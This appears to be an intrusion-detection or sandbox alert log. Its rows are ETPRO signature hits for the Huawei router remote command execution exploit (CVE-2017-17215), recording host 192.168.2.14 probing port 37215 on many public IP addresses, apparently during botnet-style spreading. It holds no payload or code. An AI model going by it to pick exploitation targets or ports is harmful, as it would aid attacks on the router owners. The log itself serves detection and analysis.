                                            06/14/24-10:44:22.859607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037837215192.168.2.14197.152.162.145
                                            06/14/24-10:44:22.878779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902037215192.168.2.14197.162.246.162
                                            06/14/24-10:44:35.182924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155037215192.168.2.14156.143.88.155
                                            06/14/24-10:44:02.366730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255637215192.168.2.14156.142.39.255
                                            06/14/24-10:44:31.082357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087237215192.168.2.14197.140.127.1
                                            06/14/24-10:44:06.450704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930637215192.168.2.1441.248.106.182
                                            06/14/24-10:43:43.944816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254837215192.168.2.14197.197.66.137
                                            06/14/24-10:43:54.182701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167837215192.168.2.14156.29.31.213
                                            06/14/24-10:44:29.013983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558237215192.168.2.1441.157.155.61
                                            06/14/24-10:44:31.054129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776837215192.168.2.14156.240.88.129
                                            06/14/24-10:44:18.779810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.14197.160.202.162
                                            06/14/24-10:44:33.147902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587037215192.168.2.14197.129.20.19
                                            06/14/24-10:44:22.859729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329437215192.168.2.14197.119.7.60
                                            06/14/24-10:43:45.968999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405037215192.168.2.14197.31.192.15
                                            06/14/24-10:44:31.078504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131237215192.168.2.14156.248.95.229
                                            06/14/24-10:43:34.663384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468037215192.168.2.14156.60.18.213
                                            06/14/24-10:44:20.804759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048037215192.168.2.14156.212.241.204
                                            06/14/24-10:43:48.021280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790437215192.168.2.14197.150.238.249
                                            06/14/24-10:43:48.028791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864637215192.168.2.1441.50.112.219
                                            06/14/24-10:43:58.290633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890637215192.168.2.14156.152.149.184
                                            06/14/24-10:44:10.545865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109837215192.168.2.14197.123.91.175
                                            06/14/24-10:44:14.667723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920837215192.168.2.1441.98.10.13
                                            06/14/24-10:43:39.788829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154437215192.168.2.14156.152.239.250
                                            06/14/24-10:43:37.761807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848437215192.168.2.14197.94.214.237
                                            06/14/24-10:43:48.033956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625037215192.168.2.14156.11.36.253
                                            06/14/24-10:43:34.662188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315037215192.168.2.1441.211.139.167
                                            06/14/24-10:44:24.941957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764437215192.168.2.1441.186.246.136
                                            06/14/24-10:44:31.083214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838037215192.168.2.14197.91.110.56
                                            06/14/24-10:43:45.969316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528637215192.168.2.1441.173.204.169
                                            06/14/24-10:44:08.502938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343037215192.168.2.1441.235.187.105
                                            06/14/24-10:43:43.967532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472437215192.168.2.14156.168.61.191
                                            06/14/24-10:43:34.663092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783237215192.168.2.1441.14.203.251
                                            06/14/24-10:43:52.146848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817637215192.168.2.14197.167.2.64
                                            06/14/24-10:44:00.322335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940437215192.168.2.14156.207.77.146
                                            06/14/24-10:44:35.180621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827437215192.168.2.14197.140.5.173
                                            06/14/24-10:43:50.115322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331237215192.168.2.14156.84.192.117
                                            06/14/24-10:43:43.941474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850237215192.168.2.14197.199.149.9
                                            06/14/24-10:43:34.662715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666037215192.168.2.1441.76.10.213
                                            06/14/24-10:43:58.290573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914637215192.168.2.14156.220.149.142
                                            06/14/24-10:44:06.449309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801837215192.168.2.1441.201.37.27
                                            06/14/24-10:43:37.759409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925637215192.168.2.14197.205.109.92
                                            06/14/24-10:44:06.473568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882037215192.168.2.1441.128.147.180
                                            06/14/24-10:43:43.942302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594437215192.168.2.1441.143.51.170
                                            06/14/24-10:43:41.897307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815237215192.168.2.1441.88.32.119
                                            06/14/24-10:43:48.022047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038837215192.168.2.1441.78.211.125
                                            06/14/24-10:43:52.164194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420037215192.168.2.14156.93.56.30
                                            06/14/24-10:43:52.160327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262437215192.168.2.14156.135.186.34
                                            06/14/24-10:44:14.667077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881037215192.168.2.14197.82.195.33
                                            06/14/24-10:44:35.181614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332037215192.168.2.1441.238.26.220
                                            06/14/24-10:43:52.143054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778837215192.168.2.1441.3.101.83
                                            06/14/24-10:43:56.224673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359037215192.168.2.1441.74.18.20
                                            06/14/24-10:44:00.338041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416237215192.168.2.1441.191.1.176
                                            06/14/24-10:44:12.646383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937637215192.168.2.14197.197.202.177
                                            06/14/24-10:44:20.827944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700037215192.168.2.14197.90.144.197
                                            06/14/24-10:44:24.913282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644237215192.168.2.1441.117.91.71
                                            06/14/24-10:43:48.017154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753037215192.168.2.14197.159.197.11
                                            06/14/24-10:43:36.703573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812637215192.168.2.1441.118.245.14
                                            06/14/24-10:43:48.032548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260037215192.168.2.1441.62.13.208
                                            06/14/24-10:44:02.385739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585637215192.168.2.14156.166.152.184
                                            06/14/24-10:44:27.000628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373837215192.168.2.1441.175.32.248
                                            06/14/24-10:43:54.184045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345437215192.168.2.1441.185.94.228
                                            06/14/24-10:44:18.776069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5962437215192.168.2.1441.250.193.88
                                            06/14/24-10:44:18.762384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410637215192.168.2.14197.115.119.231
                                            06/14/24-10:44:35.179937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699237215192.168.2.14156.159.43.45
                                            06/14/24-10:43:37.763022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886837215192.168.2.1441.35.249.57
                                            06/14/24-10:43:36.725671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112037215192.168.2.14197.104.152.127
                                            06/14/24-10:44:24.941682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433837215192.168.2.1441.132.89.9
                                            06/14/24-10:43:43.967741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607237215192.168.2.1441.96.11.75
                                            06/14/24-10:43:43.940848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517237215192.168.2.14156.55.69.224
                                            06/14/24-10:43:34.661855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543837215192.168.2.1441.103.250.3
                                            06/14/24-10:44:00.341576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034237215192.168.2.1441.167.25.16
                                            06/14/24-10:44:26.978258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3307037215192.168.2.14197.195.230.75
                                            06/14/24-10:43:36.701029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094637215192.168.2.14197.60.130.53
                                            06/14/24-10:43:52.149141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779637215192.168.2.1441.17.89.112
                                            06/14/24-10:43:52.148184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087037215192.168.2.14197.132.78.207
                                            06/14/24-10:44:06.450824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291437215192.168.2.14156.45.25.188
                                            06/14/24-10:44:00.322900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312837215192.168.2.1441.53.24.80
                                            06/14/24-10:43:50.074058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843037215192.168.2.14156.135.199.251
                                            06/14/24-10:44:10.546496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778837215192.168.2.1441.242.23.150
                                            06/14/24-10:43:36.705370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895237215192.168.2.1441.64.196.190
                                            06/14/24-10:44:00.323167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405637215192.168.2.14197.178.252.78
                                            06/14/24-10:44:14.683290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961037215192.168.2.1441.197.70.196
                                            06/14/24-10:44:29.014423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844837215192.168.2.1441.170.247.249
                                            06/14/24-10:43:54.186589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634637215192.168.2.14156.79.222.154
                                            06/14/24-10:44:27.001983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011237215192.168.2.1441.179.130.138
                                            06/14/24-10:43:41.848365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024437215192.168.2.1441.250.74.98
                                            06/14/24-10:44:08.504712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788437215192.168.2.14156.57.222.145
                                            06/14/24-10:43:41.850352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316037215192.168.2.14156.77.171.85
                                            06/14/24-10:44:29.024022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269037215192.168.2.14156.33.246.221
                                            06/14/24-10:44:04.410149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402237215192.168.2.1441.233.82.126
                                            06/14/24-10:44:18.766958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886237215192.168.2.1441.102.31.57
                                            06/14/24-10:44:20.804095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200437215192.168.2.1441.126.165.103
                                            06/14/24-10:44:33.132271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411237215192.168.2.14197.63.126.50
                                            06/14/24-10:44:26.978493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327037215192.168.2.14156.104.83.233
                                            06/14/24-10:43:41.850271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620837215192.168.2.1441.136.10.6
                                            06/14/24-10:43:43.971616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.1441.194.89.158
                                            06/14/24-10:43:45.967422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758237215192.168.2.14156.67.186.54
                                            06/14/24-10:44:29.015058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365837215192.168.2.14197.245.191.124
                                            06/14/24-10:43:54.181634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994437215192.168.2.1441.77.76.143
                                            06/14/24-10:43:56.228225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615037215192.168.2.14156.33.206.26
                                            06/14/24-10:44:08.501211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890837215192.168.2.14197.236.202.194
                                            06/14/24-10:44:20.803728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402637215192.168.2.14197.241.213.212
                                            06/14/24-10:43:34.663579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507437215192.168.2.1441.103.79.200
                                            06/14/24-10:43:34.677769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486437215192.168.2.14197.136.204.131
                                            06/14/24-10:44:10.546104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413237215192.168.2.14197.221.144.201
                                            06/14/24-10:44:31.087800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386837215192.168.2.1441.245.53.22
                                            06/14/24-10:44:06.470007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974837215192.168.2.1441.188.226.204
                                            06/14/24-10:44:10.542973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692037215192.168.2.14156.246.165.66
                                            06/14/24-10:44:14.667800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682237215192.168.2.1441.8.192.206
                                            06/14/24-10:44:16.717410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763637215192.168.2.14156.32.208.10
                                            06/14/24-10:44:16.719126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425837215192.168.2.1441.115.169.160
                                            06/14/24-10:43:50.072542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.1441.241.225.78
                                            06/14/24-10:43:48.021402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674037215192.168.2.14156.166.180.121
                                            06/14/24-10:43:48.029213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777237215192.168.2.14156.147.66.25
                                            06/14/24-10:44:29.014173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816637215192.168.2.1441.174.128.181
                                            06/14/24-10:44:00.336892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803037215192.168.2.14197.102.2.133
                                            06/14/24-10:44:08.519308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987637215192.168.2.14197.65.241.119
                                            06/14/24-10:44:06.453792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400237215192.168.2.14197.223.93.26
                                            06/14/24-10:44:35.182874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616437215192.168.2.14156.222.125.154
                                            06/14/24-10:44:33.131575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882037215192.168.2.14197.185.197.22
                                            06/14/24-10:44:33.148309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266637215192.168.2.14156.131.253.106
                                            06/14/24-10:43:52.149174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939237215192.168.2.14156.122.12.191
                                            06/14/24-10:43:48.032300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827237215192.168.2.14197.238.162.161
                                            06/14/24-10:43:58.291315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509637215192.168.2.14197.150.141.224
                                            06/14/24-10:44:18.761268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379837215192.168.2.14156.126.116.244
                                            06/14/24-10:43:48.028940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482037215192.168.2.14156.183.166.31
                                            06/14/24-10:43:43.967706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832837215192.168.2.14197.153.235.101
                                            06/14/24-10:44:29.023501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941837215192.168.2.14197.158.248.111
                                            06/14/24-10:44:31.054273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011837215192.168.2.14156.203.222.62
                                            06/14/24-10:44:33.152760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394037215192.168.2.14197.5.231.18
                                            06/14/24-10:44:12.642892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060037215192.168.2.14156.249.10.181
                                            06/14/24-10:44:29.015199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613037215192.168.2.14156.107.192.12
                                            06/14/24-10:44:33.133072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887237215192.168.2.14197.169.42.4
                                            06/14/24-10:43:56.228965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788237215192.168.2.1441.148.97.114
                                            06/14/24-10:44:26.979805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938237215192.168.2.14156.31.146.22
                                            06/14/24-10:44:02.383991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367837215192.168.2.14156.246.158.242
                                            06/14/24-10:44:16.732188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926437215192.168.2.14197.202.150.156
                                            06/14/24-10:43:54.200819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882237215192.168.2.14156.181.254.169
                                            06/14/24-10:43:58.290089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364437215192.168.2.14197.69.11.42
                                            06/14/24-10:44:04.425058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566437215192.168.2.14156.33.234.229
                                            06/14/24-10:44:20.805206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130037215192.168.2.14197.62.146.247
                                            06/14/24-10:44:20.806371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549237215192.168.2.1441.150.82.22
                                            06/14/24-10:44:26.977829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649837215192.168.2.14156.198.217.235
                                            06/14/24-10:43:41.898219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149237215192.168.2.14197.189.146.28
                                            06/14/24-10:44:08.503908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733637215192.168.2.14197.255.197.153
                                            06/14/24-10:44:00.322679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586637215192.168.2.14197.166.179.201
                                            06/14/24-10:43:45.969202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305037215192.168.2.14156.254.238.223
                                            06/14/24-10:43:45.989703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079237215192.168.2.14197.203.195.179
                                            06/14/24-10:44:29.015084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737437215192.168.2.14156.48.81.6
                                            06/14/24-10:43:41.848287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660037215192.168.2.14197.108.169.253
                                            06/14/24-10:43:54.183757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252237215192.168.2.1441.14.49.58
                                            06/14/24-10:44:18.762848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334837215192.168.2.1441.182.148.60
                                            06/14/24-10:44:18.776719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074837215192.168.2.14197.233.100.250
                                            06/14/24-10:44:08.518024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642437215192.168.2.14197.26.96.20
                                            06/14/24-10:44:16.733510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843837215192.168.2.14197.83.174.117
                                            06/14/24-10:44:27.000724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756837215192.168.2.14156.125.51.246
                                            06/14/24-10:44:20.829057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585237215192.168.2.14197.15.153.214
                                            06/14/24-10:43:39.790344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441837215192.168.2.14156.120.33.84
                                            06/14/24-10:43:54.186468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445037215192.168.2.1441.140.211.132
                                            06/14/24-10:44:22.882292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990837215192.168.2.14197.217.50.146
                                            06/14/24-10:44:00.343039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457437215192.168.2.14156.118.25.11
                                            06/14/24-10:43:34.662755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758237215192.168.2.1441.49.177.241
                                            06/14/24-10:44:24.916849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885437215192.168.2.14156.46.94.175
                                            06/14/24-10:43:48.018177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695837215192.168.2.14156.212.129.255
                                            06/14/24-10:44:24.917401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986237215192.168.2.14197.113.77.208
                                            06/14/24-10:44:29.022812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709437215192.168.2.1441.225.39.199
                                            06/14/24-10:44:14.673161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414437215192.168.2.14156.202.24.45
                                            06/14/24-10:43:41.847803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093237215192.168.2.1441.201.211.176
                                            06/14/24-10:43:43.943529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579437215192.168.2.14156.7.209.51
                                            06/14/24-10:43:50.112320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.14156.44.96.139
                                            06/14/24-10:44:31.054474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369437215192.168.2.1441.219.118.25
                                            06/14/24-10:43:43.969817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839237215192.168.2.14197.214.153.224
                                            06/14/24-10:43:52.149964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477037215192.168.2.1441.224.12.206
                                            06/14/24-10:44:22.857974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422837215192.168.2.14156.138.210.201
                                            06/14/24-10:43:54.183983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617037215192.168.2.14197.132.130.128
                                            06/14/24-10:44:02.381538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027837215192.168.2.14156.225.229.12
                                            06/14/24-10:44:00.342366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581637215192.168.2.14197.208.65.153
                                            06/14/24-10:44:35.180666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610837215192.168.2.1441.210.96.155
                                            06/14/24-10:43:48.016156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052637215192.168.2.14156.88.80.43
                                            06/14/24-10:44:33.133291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064637215192.168.2.1441.204.130.95
                                            06/14/24-10:43:43.944188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102437215192.168.2.1441.120.147.232
                                            06/14/24-10:43:52.150490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5830837215192.168.2.14156.215.143.192
                                            06/14/24-10:44:00.340764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328237215192.168.2.14156.131.89.212
                                            06/14/24-10:44:16.737758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018837215192.168.2.14156.27.247.34
                                            06/14/24-10:43:43.968191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073437215192.168.2.14197.129.4.242
                                            06/14/24-10:43:48.019061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160037215192.168.2.1441.187.166.95
                                            06/14/24-10:43:48.021180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922837215192.168.2.1441.152.181.119
                                            06/14/24-10:44:10.543141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177837215192.168.2.1441.242.169.15
